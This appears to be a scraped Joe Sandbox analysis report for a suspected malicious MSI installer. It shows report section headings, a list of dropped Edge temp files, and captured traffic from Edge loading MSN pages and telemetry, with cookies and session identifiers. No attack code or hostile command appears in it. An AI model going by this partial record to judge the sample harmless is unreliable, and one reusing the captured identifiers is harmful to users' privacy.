2025-01-09 13:41:07 UTC	1033	IN	Data Raw: 63 2d 66 34 63 34 2d 34 38 65 31 2d 61 62 34 36 2d 62 36 31 33 65 65 31 36 63 37 35 62 2f 37 39 35 65 62 33 38 64 2d 34 33 34 33 2d 34 39 66 62 2d 38 33 65 66 2d 30 36 37 64 61 37 35 38 34 31 62 34 22 2c 22 76 37 32 30 22 3a 22 65 31 62 35 38 63 34 33 2d 63 62 30 38 2d 34 36 35 61 2d 62 31 63 62 2d 36 31 32 31 64 38 66 65 66 64 32 62 2f 66 66 61 62 38 31 39 63 2d 35 38 35 34 2d 34 30 65 35 2d 39 31 33 33 2d 65 30 32 61 33 37 66 38 37 62 38 66 22 2c 22 76 31 30 38 30 22 3a 22 66 64 62 30 62 34 33 34 2d 35 31 31 39 2d 34 64 62 38 2d 62 30 62 33 2d 36 66 31 32 62 61 30 38 33 34 35 63 2f 63 31 35 35 35 30 63 65 2d 66 66 66 37 2d 34 39 30 34 2d 62 32 35 63 2d 33 66 63 35 30 63 33 62 62 61 64 37 22 2c 22 76 31 34 34 30 22 3a 22 65 65 65 66 63 61 65 64 2d 35 33 Data Ascii: c-f4c4-48e1-ab46-b613ee16c75b/795eb38d-4343-49fb-83ef-067da75841b4","v720":"e1b58c43-cb08-465a-b1cb-6121d8fefd2b/ffab819c-5854-40e5-9133-e02a37f87b8f","v1080":"fdb0b434-5119-4db8-b0b3-6f12ba08345c/c15550ce-fff7-4904-b25c-3fc50c3bbad7","v1440":"eeefcaed-53
2025-01-09 13:41:07 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 68 69 72 5f 4d 6f 75 6b 61 72 7a 65 6c 2f 41 6d 61 7a 69 6e 67 20 41 65 72 69 61 6c 20 41 67 65 6e 63 79 22 2c 22 66 69 72 73 74 46 72 61 6d 65 22 3a 7b 22 69 31 30 30 22 3a 22 41 41 31 32 51 38 77 32 22 2c 22 69 32 34 30 22 3a 22 41 41 31 32 51 38 77 35 22 2c 22 69 37 32 30 22 3a 22 41 41 31 32 50 7a 5a 4f 22 2c 22 69 31 30 38 30 22 3a 22 41 41 31 32 50 46 6b 43 22 2c 22 69 31 34 34 30 22 3a 22 41 41 31 32 50 72 50 35 22 2c 22 69 32 31 36 30 22 3a 22 41 41 31 32 50 46 6b 44 22 7d 2c 22 76 69 64 65 6f 22 3a 7b 22 76 32 34 30 22 3a 22 38 62 64 64 66 30 39 37 2d 36 35 33 33 2d 34 63 66 36 2d 39 62 64 31 2d 66 33 32 61 32 64 37 66 31 61 31 37 2f 36 30 37 31 31 37 66 35 2d 32 38 61 33 2d 34 35 66 39 2d 38 61 31 36 2d 39 37 65 63 Data Ascii: 00004000hir_Moukarzel/Amazing Aerial Agency","firstFrame":{"i100":"AA12Q8w2","i240":"AA12Q8w5","i720":"AA12PzZO","i1080":"AA12PFkC","i1440":"AA12PrP5","i2160":"AA12PFkD"},"video":{"v240":"8bddf097-6533-4cf6-9bd1-f32a2d7f1a17/607117f5-28a3-45f9-8a16-97ec
2025-01-09 13:41:07 UTC	12	IN	Data Raw: 65 20 53 79 6e 65 76 79 72 20 0d 0a Data Ascii: e Synevyr
2025-01-09 13:41:07 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 69 6e 20 74 68 65 20 43 61 72 70 61 74 68 69 61 6e 73 20 4d 6f 75 6e 74 61 69 6e 73 2c 20 55 6b 72 61 69 6e 65 22 2c 22 76 69 64 65 6f 31 35 36 22 3a 22 53 6f 75 74 68 20 53 74 61 63 6b 20 4c 69 67 68 74 68 6f 75 73 65 20 6e 65 61 72 20 48 6f 6c 79 68 65 61 64 20 69 6e 20 57 61 6c 65 73 22 2c 22 76 69 64 65 6f 31 35 37 22 3a 22 53 74 61 72 6c 69 6e 67 73 20 6d 75 72 6d 61 72 61 74 69 6f 6e 20 6e 65 61 72 20 50 61 6c 61 63 65 20 50 69 65 72 2c 20 42 72 69 67 68 74 6f 6e 2c 20 45 6e 67 6c 61 6e 64 22 2c 22 76 69 64 65 6f 31 35 38 22 3a 22 42 61 72 6e 20 6f 77 6c 20 69 6e 20 61 20 66 69 65 6c 64 20 6f 66 20 70 6f 70 70 69 65 73 22 2c 22 76 69 64 65 6f 31 35 39 22 3a 22 53 70 72 69 6e 67 62 6f 6b 73 20 69 6e 20 4b 67 61 6c 61 67 Data Ascii: 00004000in the Carpathians Mountains, Ukraine","video156":"South Stack Lighthouse near Holyhead in Wales","video157":"Starlings murmaration near Palace Pier, Brighton, England","video158":"Barn owl in a field of poppies","video159":"Springboks in Kgalag
2025-01-09 13:41:07 UTC	12	IN	Data Raw: 72 6f 75 6e 64 22 2c 22 70 72 0d 0a Data Ascii: round","pr
2025-01-09 13:41:07 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 6f 6d 6f 74 65 64 4c 69 6e 6b 73 22 3a 22 53 68 6f 77 20 70 72 6f 6d 6f 74 65 64 20 6c 69 6e 6b 73 22 2c 22 71 75 69 63 6b 42 72 69 65 66 22 3a 22 53 68 6f 77 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 63 61 72 64 22 2c 22 6f 70 65 6e 49 6e 4e 65 77 54 61 62 22 3a 22 4f 70 65 6e 20 69 6e 20 61 20 6e 65 77 20 74 61 62 22 2c 22 71 75 69 63 6b 4c 69 6e 6b 73 44 72 6f 70 44 6f 77 6e 22 3a 22 51 75 69 63 6b 20 6c 69 6e 6b 73 22 2c 22 71 75 69 63 6b 4c 69 6e 6b 73 41 6e 64 53 65 61 72 63 68 22 3a 22 51 75 69 63 6b 20 6c 69 6e 6b 73 20 5c 75 30 30 32 36 20 73 65 61 72 63 68 22 2c 22 71 75 69 63 6b 4c 69 6e 6b 73 31 52 6f 77 22 3a 22 31 20 72 6f 77 22 2c 22 71 75 69 63 6b 4c 69 6e 6b 73 32 52 6f 77 73 22 3a 22 32 20 72 6f 77 73 22 2c Data Ascii: 00004000omotedLinks":"Show promoted links","quickBrief":"Show notification card","openInNewTab":"Open in a new tab","quickLinksDropDown":"Quick links","quickLinksAndSearch":"Quick links \u0026 search","quickLinks1Row":"1 row","quickLinks2Rows":"2 rows",

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:07 UTC	633	OUT	HEAD /statics/icons/favicon.ico HTTP/1.1 Host: assets.msn.com Connection: keep-alive Pragma: no-cache Cache-Control: no-cache sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:41:07 UTC	984	IN	HTTP/1.1 200 OK Content-Type: image/x-icon ETag: "b1a1d42024fa6e32ed87f61fd9507274:1574197118.459201" Last-Modified: Tue, 19 Nov 2019 20:58:17 GMT Server: AkamaiNetStorage Date: Thu, 09 Jan 2025 13:41:07 GMT Connection: close Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=184.28.190.55,b=245537045,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 184.28.190.55 Akamai-Request-ID: ea29915 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Cache-Control: public, max-age=31536000 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Timing-Allow-Origin: * Akamai-GRN: 0.37be1cb8.1736430067.ea29915 Vary: Origin

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:08 UTC	925	OUT	GET /b?rn=1736430067774&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3AADB05FC3906D36247DA530C2F26CF4&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:41:08 UTC	956	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Thu, 09 Jan 2025 13:41:08 GMT Location: /b2?rn=1736430067774&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3AADB05FC3906D36247DA530C2F26CF4&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1B69ceef9c01beafbf02b721736430068; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1B69ceef9c01beafbf02b721736430068; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 5d328d2e734cff11e41c897ec72f465e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P11 X-Amz-Cf-Id: F_plYaZKSZQCxcptzg7bG3OE3b2EbpuITF-t2cL3rL58tb_1SHnspg==

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cLm7ThwEvh.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\6b19d9.rbs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1b67bd51-1d16-4652-b0b6-3f6a70c08fd0.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2ec2dc6c-23f5-4f1c-8042-93d9f0c538d6.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\665ab9c8-7cbc-42a9-99c4-588740602d9d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8700093c-fab5-4c8b-a24b-3da01584a36a.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d378f590-d221-4977-be10-33c7005c08b1.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD1E8-142C.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD1E9-1D4C.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD1FC-1BE8.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD204-1BBC.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\01c20626-61fc-41aa-a8dd-9c1bcb707dd6.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\18509447-6254-4c6a-b4b2-816df789f581.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\187529dd-6801-4bd7-aff5-14dc367b9f49.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\49c26b73-9b45-4bbb-907c-237e4c09235e.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5c0b68f6-5a9c-4254-a581-e619800b6b74.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5f8927fd-3b5a-4e62-b688-947581405248.tmp

Windows Analysis Report
cLm7ThwEvh.msi

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:09 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430067772&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3857 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=3AADB05FC3906D36247DA530C2F26CF4; _EDGE_S=F=1&SID=1568EDC37D376DE73348F8AC7CFA6C29; _EDGE_V=1
2025-01-09 13:41:09 UTC	3857	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 31 3a 30 37 2e 37 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 31 36 33 34 39 65 34 2d 66 36 33 38 2d 34 35 64 33 2d 38 63 61 61 2d 33 35 30 64 30 31 32 38 31 30 38 35 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 37 36 30 34 31 32 33 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:41:07.769Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"e16349e4-f638-45d3-8caa-350d01281085","epoch":"4276041239"},"app":{"locale
2025-01-09 13:41:09 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=d3434a4ac1ed4121844d01640803eadf&HASH=d343&LV=202501&V=4&LU=1736430069226; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:41:09 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=d1bbc17b8b8c411bad54bf09040325eb; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:11:09 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1454 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:41:09 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:09 UTC	1012	OUT	GET /b2?rn=1736430067774&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3AADB05FC3906D36247DA530C2F26CF4&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1B69ceef9c01beafbf02b721736430068; XID=1B69ceef9c01beafbf02b721736430068
2025-01-09 13:41:09 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Thu, 09 Jan 2025 13:41:09 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 77f996b8fbacf0f3f9e92ea84c0aeb9e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P1 X-Amz-Cf-Id: 8MWmGkjp9nZmLVLmPO0jrNHvx8-tHGKdTuA8rEoINAWNZAgCyDIkpg==

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:09 UTC	1261	OUT	GET /c.gif?rnd=1736430067774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c0bbf685d83c442b9fe503242c20b6fc&activityId=c0bbf685d83c442b9fe503242c20b6fc&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=C7020E5FD97649BABA433FD711F27806&MUID=3AADB05FC3906D36247DA530C2F26CF4 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3AADB05FC3906D36247DA530C2F26CF4; _EDGE_S=F=1&SID=1568EDC37D376DE73348F8AC7CFA6C29; _EDGE_V=1; SM=T
2025-01-09 13:41:10 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT Accept-Ranges: bytes ETag: "dda11c98eb61db1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=3AADB05FC3906D36247DA530C2F26CF4; domain=.msn.com; expires=Tue, 03-Feb-2026 13:41:09 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=3AADB05FC3906D36247DA530C2F26CF4; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:41:09 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:41:09 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 13:51:09 GMT; path=/; SameSite=None; Secure; Date: Thu, 09 Jan 2025 13:41:09 GMT Connection: close Content-Length: 42
2025-01-09 13:41:10 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:11 UTC	1026	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430069999&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11053 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3AADB05FC3906D36247DA530C2F26CF4; _EDGE_S=F=1&SID=1568EDC37D376DE73348F8AC7CFA6C29; _EDGE_V=1
2025-01-09 13:41:11 UTC	11053	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 31 3a 30 39 2e 39 39 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 31 36 33 34 39 65 34 2d 66 36 33 38 2d 34 35 64 33 2d 38 63 61 61 2d 33 35 30 64 30 31 32 38 31 30 38 35 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 37 36 30 34 31 32 33 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:41:09.998Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"e16349e4-f638-45d3-8caa-350d01281085","epoch":"4276041239"},"app":{"locale
2025-01-09 13:41:11 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=83cab848810d467aaec13ceba08acec0&HASH=83ca&LV=202501&V=4&LU=1736430071406; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:41:11 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=4f0a46275cb54615b300c1482b129028; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:11:11 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1407 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:41:11 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:12 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430070992&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9881 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3AADB05FC3906D36247DA530C2F26CF4; _EDGE_S=F=1&SID=1568EDC37D376DE73348F8AC7CFA6C29; _EDGE_V=1; msnup=
2025-01-09 13:41:12 UTC	9881	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 31 3a 31 30 2e 39 39 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 31 36 33 34 39 65 34 2d 66 36 33 38 2d 34 35 64 33 2d 38 63 61 61 2d 33 35 30 64 30 31 32 38 31 30 38 35 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 37 36 30 34 31 32 33 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:41:10.991Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"e16349e4-f638-45d3-8caa-350d01281085","epoch":"4276041239"},"app":{"loc
